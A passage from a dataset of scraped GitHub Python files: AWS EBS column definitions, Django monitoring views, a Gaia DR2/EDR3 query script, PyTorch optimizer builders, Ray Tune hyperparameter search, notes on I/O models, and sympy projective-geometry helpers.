(IOPS). For gp3 , io1 , and io2 volumes, this represents the number of IOPS that are provisioned for the volume. For gp2 volumes, this represents the baseline performance of the volume and the rate at which the volume accumulates I/O credits for bursting\", # noqa: E501\n hydrate=\"Iops\",\n name=\"iops\",\n type=Integer,\n ),\n DataSourceColumn(\n description=\"Indicates whether Amazon EBS Multi-Attach is enabled\",\n hydrate=\"MultiAttachEnabled\",\n name=\"multi_attach_enabled\",\n type=Boolean,\n ),\n DataSourceColumn(\n description=\"The name the volume\",\n hydrate=\"Tags[?Key=='Name'] | [0].Value\",\n name=\"name\",\n ),\n DataSourceColumn(\n description=\"The size of the volume, in GiBs\",\n hydrate=\"Size\",\n name=\"size\",\n type=Integer,\n ),\n DataSourceColumn(\n description=\"The snapshot from which the volume was created, if applicable\", # noqa: E501\n hydrate=\"SnapshotId\",\n name=\"snapshot_id\",\n ),\n DataSourceColumn(\n description=\"The volume state\",\n hydrate=\"State\",\n name=\"state\",\n type=ENUM(\n \"available\",\n \"creating\",\n \"deleted\",\n \"deleting\",\n \"error\",\n \"in-use\",\n name=\"aws_ebs_volumes_state_enum\",\n ),\n ),\n DataSourceColumn(\n description=\"Any tags assigned to the volume\",\n hydrate=\"Tags\",\n index=True,\n name=\"tags\",\n transform=beautify_tags,\n type=JSONB,\n ),\n DataSourceColumn(\n hydrate=\"Throughput\",\n name=\"throughput\",\n type=Integer,\n description=\"The throughput that the volume supports, in MiB/s\",\n ),\n DataSourceColumn(\n description=\"The ID of the volume\",\n hydrate=\"VolumeId\",\n index=True,\n name=\"volume_id\",\n ),\n DataSourceColumn(\n description=\"The volume type\",\n hydrate=\"VolumeType\",\n index=True,\n name=\"volume_type\",\n type=ENUM(\n \"gp2\",\n \"gp3\",\n \"io1\",\n \"io2\",\n \"sc1\",\n \"st1\",\n \"standard\",\n name=\"aws_ebs_volumes_volume_type_enum\",\n ),\n ),\n ]\n\n enrich_config: Dict = {}\n\n excluded_default_columns: List[str] = []\n\n extract_config = {\n \"method_name\": \"describe_volumes\",\n \"results_filter\": \"Volumes[]\",\n \"service_name\": \"ec2\",\n }\n","repo_name":"jmfontaine/pantomath","sub_path":"src/pantomath/provider/aws/ebs/volumes.py","file_name":"volumes.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"39001727151","text":"from django.shortcuts import render\nfrom data_visualization.models import Donnee_capteur, Salle, Montage, Boitier, Climat_exterieur\n\n\ndef listeDepartement(departements):\n\n departementsUnique = []\n departementsUnique = list(dict.fromkeys(departements))\n\n return departementsUnique\n\n\ndef home(request):\n\n MontageActif = (Montage.objects.filter(actif=True))\n salles = []\n departements = []\n donnees = []\n noms_montage = []\n for x in MontageActif:\n derniere_donnee = Donnee_capteur.objects.filter(\n montage=x.id, donnee_aberrante=False).last()\n\n '''\n Cette condition permet d'éviter que le site plante quand on ajoute un nouveau dispositif\n qu'il est actif, mais qu'il n'a pas encore enregistré une donnée.\n '''\n if derniere_donnee != None:\n donnees.append(derniere_donnee)\n salle = Salle.objects.get(boitier__montage__pk=x.id)\n salles.append(salle)\n departements.append(Salle.objects.get(\n boitier__montage__pk=x.id).departement)\n noms_montage.append(x.nom_montage)\n\n liste = list(zip(donnees, salles, noms_montage))\n\n context = {\n 'salle_navbar': salles,\n 'departements': listeDepartement(departements),\n 'liste': liste,\n 'enviroCanada': [Climat_exterieur.objects.last()]\n }\n\n return render(request, 'monitoring/home.html', context)\n\n\ndef about(request):\n\n MontageActif = Montage.objects.filter(actif=True)\n salle_navbar = []\n donnees_navbar = []\n\n for x in MontageActif:\n donnees_navbar.append(\n Donnee_capteur.objects.filter(montage=x.id).last())\n salle_navbar.append(Salle.objects.get(boitier__montage=x.id))\n\n liste = list(zip(donnees_navbar, salle_navbar))\n\n context = {\n 'title': 'About',\n 'liste': liste,\n 'enviroCanada': [Climat_exterieur.objects.last()]\n }\n\n return render(request, 'monitoring/about.html', context)\n","repo_name":"ejomphe/MONITORING-POLY-CHUM","sub_path":"monitoring_web_app/monitoring/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5084065845","text":"\nimport os\nimport ast\nimport numpy as np\nfrom astropy.io import ascii\nfrom astropy.table import Table\nfrom uncertainties import ufloat\nfrom uncertainties import unumpy as unp\nfrom modules import getData, writeOut, makePlot\nfrom modules._version import __version__\n\n\ndef main():\n \"\"\"\n Explore data downloaded via the astroquery package.\n\n Vizier Gaia DR2 column names:\n http://vizier.u-strasbg.fr/viz-bin/VizieR-3?-source=I/345/gaia2\n\n About the negative parallaxes in Gaia DR2 data:\n https://astronomy.stackexchange.com/q/26250/354\n https://astronomy.stackexchange.com/q/26071/354\n\n \"\"\"\n print(\"\\n*******************\")\n print(\" GaiaQuery {}\".format(__version__))\n print(\"*******************\")\n\n read, DR, Gmax, babusiaux_filters, clusters = readInput()\n\n if DR == '2':\n # Gaia DR2\n cat = 'I/345/gaia2'\n rv_col = 'RV'\n elif DR == '3':\n # Gaia EDR3\n cat = 'I/350/gaiaedr3'\n rv_col = 'RVDR2'\n else:\n raise ValueError(\"DR value '{}' is not supported\".format(DR))\n\n # Define color names\n col1_n, col2_n, col3_n = 'BP-RP', 'BP-G', 'G-RP'\n\n for folders in ['input', 'output']:\n if not os.path.exists(folders):\n os.makedirs(folders)\n\n for clust in clusters:\n center, box_s = (clust['cent_ra'], clust['cent_dec']), clust['box_s']\n\n data = getData.main(\n cat, Gmax, clust['name'], center, box_s, read)\n\n N_old = len(data)\n print(\"{} data read, {} sources\".format(clust['name'], N_old))\n\n if babusiaux_filters:\n data = babusiaux_filt(data)\n print(\"Filters applied, {:.1f}% of data lost\".format(\n 100. - (len(data) * 100.) / N_old))\n\n mag, e_mag = data['Gmag'], data['e_Gmag']\n col1, col2, col3 = data[col1_n], data[col2_n], data[col3_n]\n if read is False:\n print(\"Obtaining magnitudes/colors and their uncertainties\")\n e_col1, e_col2, e_col3 = uncertMags(\n DR, data, col1_n, col2_n, col3_n)\n\n print(\"Write output file in input/ folder\")\n writeOut.main(\n clust['name'], data, e_col1, e_col2, e_col3, col1_n, col2_n,\n col3_n)\n else:\n e_col1, e_col2 = data['e_' + col1_n], data['e_' + col2_n]\n\n print(\"Plotting\")\n makePlot.main(\n center, box_s, Gmax, babusiaux_filters,\n rv_col, clust['name'], data['RA_ICRS'],\n data['DE_ICRS'], mag, e_mag, col1, e_col1, col2, e_col2, col3,\n data['Plx'], data['pmRA'], data['e_pmRA'], data['pmDE'],\n data['e_pmDE'], data[rv_col], col1_n, col2_n, col3_n)\n\n print(\"\\nEnd\")\n\n\ndef babusiaux_filt(data):\n \"\"\"\n Babusiaux et al. (2018) HRD filters.\n \"\"\"\n m1 = (data['RPlx'] > 0.) # 10.\n m2 = (data['RFG'] > 50.)\n m3 = (data['RFBP'] > 20.) # 20.\n m4 = (data['RFRP'] > 20.) # 20.\n m5 = (data['E_BR_RP_'] > 1. + 0.015 * (data['BPmag'] - data['RPmag']) ** 2)\n # m6 = (data['Gmag'] < 1.e6)\n m6 = (data['E_BR_RP_'] < 1.3 + 0.06 * (data['BPmag'] - data['RPmag']) ** 2)\n m7 = (data['Nper'] > 8)\n m8 = (data['chi2AL'] / (data['NgAL'] - 5.) < 1.44 * np.clip(\n np.exp(-.4 * (data['Gmag'] - 19.5)), a_min=None, a_max=1.))\n mask = m1 & m2 & m3 & m4 & m5 & m6 & m7 & m8\n for i, m in enumerate([m1, m2, m3, m4, m5, m6, m7, m8]):\n print(\" m\" + str(i + 1) + \" removes {} sources\".format(\n len(data) - m.data.sum()))\n\n return data[mask]\n\n\ndef uncertMags(DR, data, col1_n, col2_n, col3_n):\n \"\"\"\n # Gaia DR2 zero points:\n\n https://gea.esac.esa.int/archive/documentation/GDR2/Data_processing/\n chap_cu5pho/sec_cu5pho_calibr/ssec_cu5pho_calibr_extern.html#Ch5.T2\n\n The G magnitude error:\n unp.std_devs(mag_d['G'])\n is equivalent to:\n np.sqrt((1.0857*(data['e_FG']/data['FG']))**2 + .0018**2)\n as defined in Eq 5.26 of the link above.\n\n These values are larger than the 'e_Gmag' column given by Vizier by up to\n ~0.002 for the brightest stars, and go to zero for the faintest. I don't\n really know why. I asked Vizier and their answer was:\n\n > The e_Gmag uncertainties in VizieR were added by the CDS and,\n > apparently, do not take into account the Vegamag corrections; we will\n > continue the investigation.\n >\n > In the meantime, ignoring the e_Gmag in VizieR and using the formula\n > given by Gaia DR2 seems to be the right solution.\"\n\n # Gaia EDR3 zero points:\n\n https://www.cosmos.esa.int/web/gaia/edr3-passbands\n\n \"\"\"\n # Zero points for the G,BP,RP magnitudes.\n if DR == '2':\n # Updated October 2017\n Zp_G = ufloat(25.6914396869, 0.0011309370)\n Zp_BP = ufloat(25.3488107670, 0.0004899854)\n Zp_RP = ufloat(24.7626744847, 0.0035071711)\n elif DR == '3':\n Zp_G = ufloat(25.6873668671, 0.0027553202)\n Zp_BP = ufloat(25.3385422158, 0.0027901700)\n Zp_RP = ufloat(24.7478955012, 0.0037793818)\n\n # Fluxes\n I_G = unp.uarray(data['FG'], data['e_FG'])\n I_BP = unp.uarray(data['FBP'], data['e_FBP'])\n I_RP = unp.uarray(data['FRP'], data['e_FRP'])\n\n # Magnitudes\n mag_d = {\n 'G': Zp_G + -2.5 * unp.log10(I_G),\n 'BP': Zp_BP + -2.5 * unp.log10(I_BP),\n 'RP': Zp_RP + -2.5 * unp.log10(I_RP)}\n\n # import matplotlib.pyplot as plt\n # Gmag_new = unp.nominal_values(mag_d['RP'])\n # plt.scatter(data['Gmag'], data['RPmag'] - Gmag_new, alpha=.5)\n # plt.ylabel(\"Gmag_CDS - Gmag_here\")\n # plt.xlabel(\"Gmag_CDS\")\n # plt.show()\n\n col11, col12 = col1_n.split('-')\n col21, col22 = col2_n.split('-')\n col31, col32 = col3_n.split('-')\n # Colors\n col1 = mag_d[col11] - mag_d[col12]\n col2 = mag_d[col21] - mag_d[col22]\n col3 = mag_d[col31] - mag_d[col32]\n\n # Uncertainties\n e_col1, e_col2, e_col3 = unp.std_devs(col1), unp.std_devs(col2),\\\n unp.std_devs(col3)\n\n return e_col1, e_col2, e_col3\n\n\ndef readInput():\n \"\"\"\n Read 'cluster_in.dat' data file.\n \"\"\"\n with open(\"clusters_in.dat\", 'r') as f:\n i = 0\n for line in f:\n if i != 1:\n if not line.startswith('#') and line != '\\n':\n params = line.split()\n i = 1\n else:\n data = ascii.read(f.read())\n\n read, DR, Gmax, babusiaux_filters = ast.literal_eval(params[0]),\\\n params[1], params[2], ast.literal_eval(params[3])\n\n clusters = Table(data, names=('name', 'cent_ra', 'cent_dec', 'box_s'))\n\n return read, DR, Gmax, babusiaux_filters, clusters\n\n\nif __name__ == '__main__':\n # To see available catalogs:\n # catalog_list = Vizier.find_catalogs('Pan-STARRS')\n # catalogs = Vizier.get_catalogs(catalog_list.keys())\n # print(catalogs)\n\n main()\n","repo_name":"Gabriel-p/GaiaQuery","sub_path":"GAIA_query.py","file_name":"GAIA_query.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40798372778","text":"import torch\nfrom torch import optim\nfrom torch.optim import Optimizer\n\n__all__ = [\n \"build_optimizer\",\n]\n\noptimizers = [\n # \"Adadelta\",\n # \"Adagrad\",\n \"Adam\",\n \"AdamW\",\n # \"SparseAdam\",\n # \"Adamax\",\n # \"ASGD\",\n # \"LBFGS\",\n # \"NAdam\",\n # \"RAdam\",\n # \"RMSprop\",\n # \"Rprop\",\n \"SGD\",\n]\n\n\ndef assertion(\n optimizer_type: str,\n) -> None:\n assert optimizer_type in optimizers, \\\n f\"Unsupported optimizer type: {optimizer_type}\"\n\n\ndef build_optimizer(\n model: torch.nn.Module,\n config,\n) -> Optimizer:\n optimizer_type = config.OPTIMIZER.TYPE\n\n assertion(optimizer_type)\n\n if optimizer_type == \"Adam\":\n optimizer = Adam(model, config)\n\n elif optimizer_type == \"AdamW\":\n optimizer = AdamW(model, config)\n\n elif optimizer_type == \"SGD\":\n optimizer = SGD(model, config)\n\n else:\n raise\n\n return optimizer\n\n\ndef Adam(\n model: torch.nn.Module,\n config,\n) -> Optimizer:\n \"\"\"\n in config.yaml:\n ⋮\n LR: float\n ⋮\n OPTIMIZER:\n TYPE: Adam\n WEIGHT_DECAY: float\n ⋮\n \"\"\"\n return optim.Adam(\n model.parameters(),\n lr=config.LR,\n betas=(0.9, 0.999),\n eps=1e-08,\n weight_decay=config.OPTIMIZER.WEIGHT_DECAY,\n amsgrad=False,\n )\n\n\ndef AdamW(\n model: torch.nn.Module,\n config,\n) -> Optimizer:\n \"\"\"\n in config.yaml:\n ⋮\n LR: float\n ⋮\n OPTIMIZER:\n TYPE: AdamW\n WEIGHT_DECAY: float\n ⋮\n \"\"\"\n return optim.AdamW(\n params=model.parameters(),\n lr=config.LR,\n betas=(0.9, 0.999),\n eps=1e-08,\n weight_decay=config.OPTIMIZER.WEIGHT_DECAY,\n amsgrad=False,\n )\n\n\ndef SGD(\n model: torch.nn.Module,\n config,\n) -> Optimizer:\n \"\"\"\n in config.yaml:\n ⋮\n LR: float\n ⋮\n OPTIMIZER:\n TYPE: SGD\n MOMENTUM: float\n WEIGHT_DECAY: float\n ⋮\n \"\"\"\n return optim.SGD(\n params=model.parameters(),\n lr=config.LR,\n momentum=config.OPTIMIZER.MOMENTUM,\n dampening=0,\n weight_decay=config.OPTIMIZER.WEIGHT_DECAY,\n nesterov=False,\n )\n","repo_name":"yupeeee/YupTools","sub_path":"src/yuptools/train/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26819798472","text":"import keras\nfrom vis.visualization import visualize_activation\nfrom vis.utils import utils\nimport matplotlib.pyplot as plot\n\nmodel = keras.models.load_model('mnist_model.h5')\nlayer_idx = utils.find_layer_idx(model, 'nome_exclusivo_05')\nmodel.layers[layer_idx].activation = keras.activations.linear\nmodel = utils.apply_modifications(model)\n\nfor Lp in range(-9, 11, 1):\n for classe in range(0, 10): \n plot.subplot(20,10,1+classe+10*(Lp+9))\n filter_idx = classe\n img = visualize_activation(model, layer_idx, filter_indices=filter_idx, input_range=(0., 1.), verbose=True, max_iter=1000, tv_weight=1., lp_norm_weight=float(Lp/10.0))\n plot.imshow(img.squeeze(), cmap='seismic', interpolation='nearest')\n\n# ajustando tamanho de exibição\nfig = matplotlib.pyplot.gcf()\nfig.set_size_inches(18, 18)\n# fig.savefig('test2png.png', dpi=100, forward=True)\nplot.show()\n","repo_name":"patrickctrf/IA353-EG453-Redes-Neurais","sub_path":"EFC3_IA353_1s2019/q1/q1b.py","file_name":"q1b.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15940106918","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport my_utils as utils\n\ndef main(dir_path, sub_name):\n # get all filename in directory\n filenames = utils.get_files_names(dir_path)\n\n for filename in filenames:\n new_filename = filename.replace(sub_name, \"\")\n print(filename + \" --> \" + new_filename)\n os.rename(\n os.path.join(dir_path, filename),\n os.path.join(dir_path, new_filename))\n\n# Expose functionality\ncommand = \"del-sub-name\"\narguments = [\"directory\", \"subname\"]\ndescription = \"Delete a filename substring for each file in a given directory\"\nmain_function = main","repo_name":"aliefhooghe/music-mgr","sub_path":"music-mgr-modules/del_sub_name.py","file_name":"del_sub_name.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36825858789","text":"# def add(x,y):\n# return x+y\n\n# minus = lambda x,y: x-y\n\n# def sub(x,y):\n# return x-y\n\n# print(add(5,4))\n# print(minus(5,4))\n# print(sub(5,4))\n\nl = [[2,5],[4,2],[5,6]]\nl.sort(key=lambda x:x[1], reverse=0)\nprint(l)","repo_name":"surazkarn/Git-Learning","sub_path":"LambdaFunction.py","file_name":"LambdaFunction.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15920542710","text":"from enum import Enum\n\nclass RockPaperScissors(Enum):\n X = 1\n Y = 2\n Z = 3\n A = 1\n B = 2\n C = 3\n\n def __gt__(self, other):\n if (self == self.X or self == self.A) and (other == other.C or other == other.Z):\n return True\n elif (self == self.Z or self == self.C) and (other == other.Y or other == other.B):\n return True\n elif (self == self.B or self == self.Y) and (other == other.A or other == other.X):\n return True\n else:\n return False\n \n\n\nwith open(\"Day 2/StrategyGuide.txt\", 'r') as strategyGuide:\n finalScore = 0\n for line in strategyGuide:\n finalScore += RockPaperScissors[line[2]].value\n if RockPaperScissors[line[2]] > RockPaperScissors[line[0]]:\n finalScore += 6\n elif RockPaperScissors[line[2]].value == RockPaperScissors[line[0]].value:\n finalScore += 3\n\n print(finalScore)\n \n\n\n","repo_name":"coltrane05/AdventOfCode2022","sub_path":"Day 2/Day2Solution1.py","file_name":"Day2Solution1.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38306300222","text":"DATABASES = {\n \"default\": {\n \"ENGINE\": \"django.contrib.gis.db.backends.postgis\",\n \"NAME\": \"cars\",\n \"USER\": \"carssuper\",\n \"PASSWORD\": \"\",\n \"HOST\": \"localhost\",\n \"PORT\": \"\",\n }\n}\n\nGDAL_LIBRARY_PATH = \"/opt/homebrew/Cellar/gdal/3.6.4_4/lib/libgdal.dylib\"\nGEOS_LIBRARY_PATH = \"/opt/homebrew/Cellar/geos/3.11.2/lib/libgeos_c.dylib\"\n\nDEBUG = True\n\nSQL_LOGGING_ENABLED = False\n\nif SQL_LOGGING_ENABLED:\n LOGGING = {\n \"version\": 1,\n \"filters\": {\n \"require_debug_true\": {\n \"()\": \"django.utils.log.RequireDebugTrue\",\n }\n },\n \"handlers\": {\n \"console\": {\n \"level\": \"DEBUG\",\n \"filters\": [\"require_debug_true\"],\n \"class\": \"logging.StreamHandler\",\n }\n },\n \"loggers\": {\n \"django.db.backends\": {\n \"level\": \"DEBUG\",\n \"handlers\": [\"console\"],\n }\n },\n }\n","repo_name":"pavelkraleu/greenhack-cars","sub_path":"cars/cars/settings/components/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19725883957","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n#################\n# Python imports\n#################\nimport os\nimport time\nimport threading\nimport numpy as np\nfrom tqdm import tqdm as tq\n\n##################\n# Pytorch imports\n##################\nimport torch.nn.functional as F\n\n###############\n# Tune imports\n###############\nimport ray\nfrom hyperopt import hp\nfrom ray.tune.suggest import HyperOptSearch\nfrom ray.tune.schedulers import AsyncHyperBandScheduler\nfrom ray.tune.util import pin_in_object_store, get_pinned_object\nfrom ray.tune import Trainable, run_experiments, register_trainable, Experiment\n\n################\n# local imports\n################\nfrom utils import *\n\n\npinned_obj_dict = {}\n\n\nclass TrainerClass(Trainable):\n def _setup(self, config):\n torch.backends.cudnn.deterministic = True\n self.cuda_available = torch.cuda.is_available()\n self.args = get_pinned_object(pinned_obj_dict['args'])\n seed = self.args.seed\n np.random.seed(seed)\n torch.manual_seed(seed)\n if self.cuda_available:\n torch.cuda.manual_seed(seed)\n self.data_loader_train = get_pinned_object(pinned_obj_dict['data_loader_train'])\n self.data_loader_valid = get_pinned_object(pinned_obj_dict['data_loader_valid'])\n print(\"Cuda is available: {}\".format(self.cuda_available))\n self.model = get_model()\n if self.cuda_available:\n self.model.cuda()\n opt = getattr(torch.optim, self.config['optimizer'])\n self.optimizer = opt(self.model.parameters(), lr=self.config['lr'])\n self.batch_accumulation = self.config['batch_accumulation']\n\n def _train_iter(self):\n j = 1\n self.model.train()\n self.optimizer.zero_grad()\n progress_bar = tq(self.data_loader_train)\n progress_bar.set_description(\"Training\")\n avg_loss = 0.0\n for batch_idx, (data, target) in enumerate(progress_bar):\n if self.cuda_available:\n data = data.cuda(non_blocking=True)\n target = target.cuda(non_blocking=True)\n output = self.model(data)\n loss = F.cross_entropy(output, target)\n loss.backward()\n avg_loss += loss.item()\n if j % self.batch_accumulation == 0:\n j = 1\n self.optimizer.step()\n self.optimizer.zero_grad()\n else:\n j += 1\n if batch_idx % self.args.logFrequency == 0:\n progress_bar.set_postfix({'Loss': '{:.3f}'.format(avg_loss/(batch_idx+1))})\n torch.cuda.empty_cache()\n # return avg_loss/len(self.data_loader_train)\n\n def _valid(self):\n self.model.eval()\n avg_loss = 0.0\n avg_acc = 0.0\n n_samples = 0\n progress_bar = tq(self.data_loader_valid)\n progress_bar.set_description(\"Validation\")\n for batch_idx, (data, target) in enumerate(progress_bar):\n if self.cuda_available:\n data = data.cuda(non_blocking=True)\n target = target.cuda(non_blocking=True)\n output = self.model(data)\n loss = F.cross_entropy(output, target)\n avg_loss += loss.item()\n y_hat = output.argmax(dim=1)\n avg_acc += (target == y_hat).sum().item()\n n_samples += len(target)\n if batch_idx % self.args.logFrequency == 0:\n acc = avg_acc / n_samples\n metrics = {\n 'loss': '{:.3f}'.format(avg_loss/(batch_idx+1)),\n 'acc': '{:.2f}%'.format(acc*100)\n }\n progress_bar.set_postfix(metrics)\n loss = avg_loss / len(self.data_loader_valid)\n acc = avg_acc / n_samples\n torch.cuda.empty_cache()\n return {\"loss\": loss, \"acc\": acc}\n\n def _train(self):\n self._train_iter()\n return self._valid()\n\n def _save(self, checkpoint_dir):\n checkpoint_path = os.path.join(checkpoint_dir, \"model.pth\")\n torch.save(self.model.state_dict(), checkpoint_path)\n return checkpoint_path\n\n def _restore(self, checkpoint_path):\n self.model.load_state_dict(checkpoint_path)\n\n\ndef main(args):\n\n ray.init(num_cpus=args.rayNumCpu, num_gpus=args.rayNumGpu)\n\n t_loader, v_loader = get_loaders(train_batch_size=16, num_workers=1, data_folder=args.dataFolder,\n cuda_available=torch.cuda.is_available())\n pinned_obj_dict['data_loader_train'] = pin_in_object_store(t_loader)\n pinned_obj_dict['data_loader_valid'] = pin_in_object_store(v_loader)\n pinned_obj_dict['args'] = pin_in_object_store(args)\n\n trainable_name = 'hyp_search_train'\n register_trainable(trainable_name, TrainerClass)\n\n reward_attr = \"acc\"\n\n #############################\n # Define hyperband scheduler\n #############################\n hpb = AsyncHyperBandScheduler(time_attr=\"training_iteration\",\n reward_attr=reward_attr,\n grace_period=40,\n max_t=300)\n\n ##############################\n # Define hyperopt search algo\n ##############################\n space = {\n 'lr': hp.uniform('lr', 0.001, 0.1),\n 'optimizer': hp.choice(\"optimizer\", ['SGD', 'Adam']), #, 'Adadelta']), # Adadelta gets the worst results\n 'batch_accumulation': hp.choice(\"batch_accumulation\", [4, 8, 16])\n }\n hos = HyperOptSearch(space, max_concurrent=4, reward_attr=reward_attr)\n\n #####################\n # Define experiments\n #####################\n exp_name = \"resnet152_hyp_search_hyperband_hyperopt_{}\".format(time.strftime(\"%Y-%m-%d_%H.%M.%S\"))\n exp = Experiment(\n name=exp_name,\n run=trainable_name,\n num_samples=args.numSamples, # the number of experiments\n resources_per_trial={\n \"cpu\": args.trialNumCpu,\n \"gpu\": args.trialNumGpu\n },\n checkpoint_freq=args.checkpointFreq,\n checkpoint_at_end=True,\n stop={\n reward_attr: 0.95,\n \"training_iteration\": args.trainingIteration, # how many times a specific config will be trained\n }\n )\n\n ##################\n # Run tensorboard\n ##################\n if args.runTensorBoard:\n thread = threading.Thread(target=launch_tensorboard, args=[exp_name])\n thread.start()\n launch_tensorboard(exp_name)\n\n ##################\n # Run experiments\n ##################\n run_experiments(exp, search_alg=hos, scheduler=hpb, verbose=False)\n\n\nif __name__ == \"__main__\":\n main(get_args())\n","repo_name":"fvmassoli/hyperparameters-search","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6375475665","text":"# -*- coding:utf-8 -*-\n__author__ = 'Qiushi Huang'\n\n\"\"\"\n所谓同步,就是在发出一个功能调用时,在没有得到结果之前,该调用就不会返回。按照这个定义,其实绝大多数函数都是同步调用。\n 但是一般而言,我们在说同步、异步的时候,特指那些需要其他部件协作或者需要一定时间完成的任务。\n举例:\n1. multiprocessing.Pool下的apply #发起同步调用后,就在原地等着任务结束,根本不考虑任务是在计算还是在io阻塞,总之就是一股脑地等任务结束\n2. concurrent.futures.ProcessPoolExecutor().submit(func,).result()\n3. concurrent.futures.ThreadPoolExecutor().submit(func,).result()\n\n异步的概念和同步相对。当一个异步功能调用发出后,调用者不能立刻得到结果。当该异步功能完成后,通过状态、通知或回调来通知调用者。\n 如果异步功能用状态来通知,那么调用者就需要每隔一定时间检查一次,效率就很低(有些初学多线程编程的人,总喜欢用一个循环去检查某个变量的值,这其实是一种很严重的错误)。\n 如果是使用通知的方式,效率则很高,因为异步功能几乎不需要做额外的操作。至于回调函数,其实和通知没太多区别。\n举例:\n1. multiprocessing.Pool().apply_async() #发起异步调用后,并不会等待任务结束才返回,相反,会立即获取一个临时结果(并不是最终的结果,可能是封装好的一个对象)。\n2. concurrent.futures.ProcessPoolExecutor(3).submit(func,)\n3. concurrent.futures.ThreadPoolExecutor(3).submit(func,)\n\n阻塞调用是指调用结果返回之前,当前线程会被挂起(如遇到io操作)。函数只有在得到结果之后才会将阻塞的线程激活。\n 有人也许会把阻塞调用和同步调用等同起来,实际上他是不同的。对于同步调用来说,很多时候当前线程还是激活的,只是从逻辑上当前函数没有返回而已。\n举例:\n1. 同步调用:apply一个累计1亿次的任务,该调用会一直等待,直到任务返回结果为止,但并未阻塞住(即便是被抢走cpu的执行权限,那也是处于就绪态);\n2. 阻塞调用:当socket工作在阻塞模式的时候,如果没有数据的情况下调用recv函数,则当前线程就会被挂起,直到有数据为止。\n\n非阻塞和阻塞的概念相对应,指在不能立刻得到结果之前也会立刻返回,同时该函数不会阻塞当前线程。\n\n小结:\n1. 同步与异步针对的是函数/任务的调用方式:同步就是当一个进程发起一个函数(任务)调用的时候,一直等到函数(任务)完成,\n 而进程继续处于激活状态。而异步情况下是当一个进程发起一个函数(任务)调用的时候,不会等函数返回,而是继续往下执行当,\n 函数返回的时候通过状态、通知、事件等方式通知进程任务完成。\n2. 阻塞与非阻塞针对的是进程或线程:阻塞是当请求不能满足的时候就将进程挂起,而非阻塞则不会阻塞当前进程\n\"\"\"\n\"\"\"\n本文讨论的背景是Linux环境下的network IO。\n本文最重要的参考文献是Richard Stevens的“UNIX® Network Programming Volume 1, Third Edition: The Sockets Networking ”,6.2节“I/O Models ”,\nStevens在这节中详细说明了各种IO的特点和区别,如果英文够好的话,推荐直接阅读。Stevens的文风是有名的深入浅出,所以不用担心看不懂。本文中的流程图也是截取自参考文献。\n\nStevens在文章中一共比较了五种IO Model: \n* blocking IO 阻塞I/O\n* nonblocking IO 非阻塞I/O\n* IO multiplexing I/O多路复用\n* signal driven IO 信号驱动I/O\n* asynchronous IO 异步I/O\n由signal driven IO(信号驱动IO)在实际中并不常用,所以主要介绍其余四种IO Model。\n\n\nIO发生时涉及的对象和步骤:\n两个系统对象:\n1)调用IO的process\\ thread\n2)系统内核\nread操作会经历两个阶段:\n1)等待数据准备 (Waiting for the data to be ready)\n2)将数据从内核拷贝到进程中(Copying the data from the kernel to the process)\n\"\"\"","repo_name":"hqs2212586/startMyPython3.0","sub_path":"第七章-并发编程/6 IO模型/01 IO模型.py","file_name":"01 IO模型.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74106490988","text":"from matplotlib import pyplot as plt\nfrom math import factorial,sqrt,pi,cos,sin\nimport numpy as np\nimport sympy as sym\nfrom sympy.functions.special.tensor_functions import LeviCivita as levi_civita\nimport itertools\nfrom itertools import combinations_with_replacement as repeat_combinations\nimport random\n\nplotmin = -5\nplotmax = 5\ndef get_grid():\n xs = np.linspace(plotmin, plotmax, 500)\n ys = np.linspace(plotmin, plotmax, 500)\n X,Y = np.meshgrid(xs, ys)\n return X,Y\n\ndef multinomial(n, choose):\n # Compute a multinomial coefficient.\n # e.g. multinomial(5, (2,1,2)) gives 30 (5_choose_2 * (5-2)_choose_1 * (5-2-1)_choose_2).\n assert(sum(choose) == n)\n cur = n\n coefficient = 1\n for c in choose:\n coefficient *= sym.binomial(cur, c)\n cur -= c\n return coefficient\n\ndef prod(lis):\n if len(lis) == 0:\n return 1\n t = lis[0]\n for val in lis[1:]:\n t *= val\n return t\n\n\ndef plot_line(l):\n X,Y = get_grid()\n plt.contour(X, Y, l[0]*X + l[1]*Y + l[2], 0)\n\n# ordered_sums(3, 5) will give all triples of sums 0+0+5, 0+1+4, ..., 3+1+1, etc., that add to 5.\ndef ordered_sums(terms, n):\n if terms == 1:\n yield tuple([n])\n return\n for i in range(0, n+1):\n for trailing in ordered_sums(terms-1, n-i):\n yield tuple([i]) + trailing\n\n\n\n\ndef point_point_join(p, q):\n # p: Homogeneous 3-vector.\n # q: Homogeneous 3-vector.\n # Returns: Line p^q represented by a 3x3 antisymmetric matrix.\n matrix = sym.zeros(3,3)\n for i,j in itertools.product(range(3), repeat=2):\n matrix[i,j] = p[i]*q[j] - p[j]*q[i]\n return matrix\n\n# def 